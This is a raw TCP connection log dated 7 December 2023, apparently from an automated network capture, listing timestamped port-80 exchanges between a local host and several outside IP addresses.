                                                                                                                      Dec 7, 2023 15:53:58.421787024 CET8049727194.58.112.174192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:58.421823978 CET4972780192.168.2.11194.58.112.174
                                                                                                                      Dec 7, 2023 15:53:58.421828985 CET8049727194.58.112.174192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:58.421947956 CET4972780192.168.2.11194.58.112.174
                                                                                                                      Dec 7, 2023 15:53:58.422401905 CET4972780192.168.2.11194.58.112.174
                                                                                                                      Dec 7, 2023 15:53:58.702290058 CET8049727194.58.112.174192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:13.634753942 CET4972880192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:13.962788105 CET8049728217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:13.962955952 CET4972880192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:13.963182926 CET4972880192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:14.293572903 CET8049728217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:14.773519993 CET8049728217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:14.773618937 CET8049728217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:14.773634911 CET8049728217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:14.773679972 CET4972880192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:14.773802042 CET8049728217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:14.773817062 CET8049728217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:14.773844004 CET4972880192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:14.774518013 CET8049728217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:14.774563074 CET4972880192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:14.774676085 CET8049728217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:14.774996996 CET8049728217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:14.775036097 CET4972880192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:15.465229034 CET4972880192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:16.481256962 CET4972980192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:16.804850101 CET8049729217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:16.805141926 CET4972980192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:16.805712938 CET4972980192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:17.133640051 CET8049729217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:17.610070944 CET8049729217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:17.610094070 CET8049729217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:17.610105991 CET8049729217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:17.610120058 CET8049729217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:17.610140085 CET8049729217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:17.610152006 CET8049729217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:17.610162020 CET8049729217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:17.610177040 CET4972980192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:17.610228062 CET4972980192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:17.610541105 CET8049729217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:17.610585928 CET4972980192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:18.309071064 CET4972980192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:19.325417042 CET4973080192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:19.646833897 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:19.647052050 CET4973080192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:19.647546053 CET4973080192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:19.968877077 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:19.968939066 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:20.451973915 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:20.452034950 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:20.452111959 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:20.452176094 CET4973080192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:20.452234030 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:20.452280045 CET4973080192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:20.452301025 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:20.452754021 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:20.452794075 CET4973080192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:20.452811003 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:20.452857971 CET8049730217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:20.452903986 CET4973080192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:21.152884960 CET4973080192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:22.168905973 CET4973180192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:22.488137007 CET8049731217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:22.488272905 CET4973180192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:22.488482952 CET4973180192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:22.807533979 CET8049731217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:23.241965055 CET8049731217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:23.242525101 CET8049731217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:23.242686033 CET4973180192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:23.242829084 CET4973180192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:23.560904980 CET8049731217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:23.560935974 CET8049731217.144.107.2192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:23.561081886 CET4973180192.168.2.11217.144.107.2
                                                                                                                      Dec 7, 2023 15:54:28.853497028 CET4973280192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:29.096431017 CET804973264.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:29.096570969 CET4973280192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:29.096786976 CET4973280192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:29.340286970 CET804973264.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:29.340320110 CET804973264.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:29.340473890 CET4973280192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:30.605906010 CET4973280192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:31.621969938 CET4973380192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:31.864991903 CET804973364.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:31.865113020 CET4973380192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:31.865360022 CET4973380192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:32.108922958 CET804973364.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:32.108952999 CET804973364.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:32.109095097 CET4973380192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:33.371534109 CET4973380192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:34.387450933 CET4973480192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:34.630440950 CET804973464.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:34.630599022 CET4973480192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:34.630893946 CET4973480192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:34.874170065 CET804973464.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:34.874718904 CET804973464.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:34.874810934 CET804973464.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:34.874866009 CET4973480192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:36.137197018 CET4973480192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.153294086 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.396557093 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.396823883 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.397350073 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.672962904 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.672996044 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.673012018 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.673032045 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.673046112 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.673065901 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.673094988 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.673094988 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.673135042 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.673161983 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.673193932 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.673228025 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.673265934 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.673358917 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.673392057 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.916520119 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.916548014 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.916627884 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.916627884 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.916733980 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.916770935 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.916841984 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.916928053 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.916965008 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.917253017 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.917879105 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.917917013 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.917931080 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.918102980 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.918143988 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.918184996 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.918243885 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:37.918366909 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:37.918571949 CET4973580192.168.2.1164.190.62.22
                                                                                                                      Dec 7, 2023 15:54:38.162497044 CET804973564.190.62.22192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:43.903994083 CET4973680192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:44.059351921 CET8049736207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:44.059458017 CET4973680192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:44.059851885 CET4973680192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:44.215296984 CET8049736207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:44.221690893 CET8049736207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:44.221714020 CET8049736207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:44.221785069 CET4973680192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:45.679718971 CET4973680192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:46.684420109 CET4973780192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:46.839561939 CET8049737207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:46.839644909 CET4973780192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:46.839879036 CET4973780192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:46.994765043 CET8049737207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:47.001226902 CET8049737207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:47.001255035 CET8049737207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:47.001360893 CET4973780192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:48.340328932 CET4973780192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:49.356353998 CET4973880192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:49.511996984 CET8049738207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:49.512090921 CET4973880192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:49.512392044 CET4973880192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:49.668204069 CET8049738207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:49.673922062 CET8049738207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:49.673966885 CET8049738207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:49.674200058 CET4973880192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:51.028016090 CET4973880192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.043693066 CET4973980192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.199027061 CET8049739207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:52.199304104 CET4973980192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.199393988 CET4973980192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.354720116 CET8049739207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:52.361907959 CET8049739207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:52.362062931 CET8049739207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:52.362193108 CET4973980192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.362454891 CET4973980192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.517570019 CET8049739207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:57.688442945 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:54:57.884848118 CET8049740162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:57.885004044 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:54:57.885279894 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:54:58.081675053 CET8049740162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:58.081706047 CET8049740162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:58.081760883 CET8049740162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:58.081835985 CET8049740162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:58.081901073 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:54:58.081958055 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:54:59.387250900 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:00.403214931 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:00.598994017 CET8049741162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:00.599112988 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:00.599354029 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:00.794980049 CET8049741162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:00.795011997 CET8049741162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:00.795094013 CET8049741162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:00.795110941 CET8049741162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:00.795161009 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:00.795202971 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:02.105993986 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.122360945 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.321042061 CET8049742162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:03.321171045 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.322160959 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.518512964 CET8049742162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:03.518553019 CET8049742162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:03.518632889 CET8049742162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:03.518676043 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.518704891 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.518788099 CET8049742162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:03.518855095 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:04.824598074 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:05.840894938 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.036732912 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:06.036912918 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.037158012 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.233189106 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:06.233273029 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:06.233314037 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:06.233405113 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.233479023 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:06.233577967 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.233802080 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.430335045 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.382556915 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.570930004 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.571084023 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.571609020 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.759969950 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.949938059 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.949965000 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.949996948 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950045109 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950081110 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950125933 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950161934 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950270891 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950310946 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950351000 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950464010 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950504065 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950566053 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950679064 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950716972 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950778008 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950841904 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950881004 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950896025 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950939894 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:13.074706078 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.090823889 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.279429913 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.279521942 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.279906988 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.468281031 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654086113 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654114008 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654155016 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654264927 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654335022 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654422998 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654469013 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654505014 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.654527903 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654586077 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.654623032 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654647112 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.654653072 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654719114 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654736996 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.654772997 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654792070 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654866934 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:15.793428898 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:16.846386909 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.035402060 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.035593987 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.036076069 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.224803925 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.383914948 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.383953094 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.383966923 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384026051 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384067059 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384124041 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384176016 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384222031 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384233952 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384233952 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384233952 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384268999 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384422064 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384490967 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384506941 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384520054 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384530067 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384533882 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384560108 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384579897 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:18.544004917 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:19.559458971 CET4974780192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:19.747832060 CET804974768.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:19.748043060 CET4974780192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:19.748173952 CET4974780192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:19.936388016 CET804974768.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:20.024919987 CET804974768.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:20.024943113 CET804974768.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:20.025252104 CET4974780192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:20.025424004 CET4974780192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:20.213129997 CET804974768.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:25.477310896 CET4974880192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:25.653352976 CET804974884.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:25.653552055 CET4974880192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:25.654483080 CET4974880192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:25.830404997 CET804974884.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:25.830673933 CET804974884.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:28.184653997 CET4974980192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:28.360647917 CET804974984.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:28.360757113 CET4974980192.168.2.1184.32.84.32
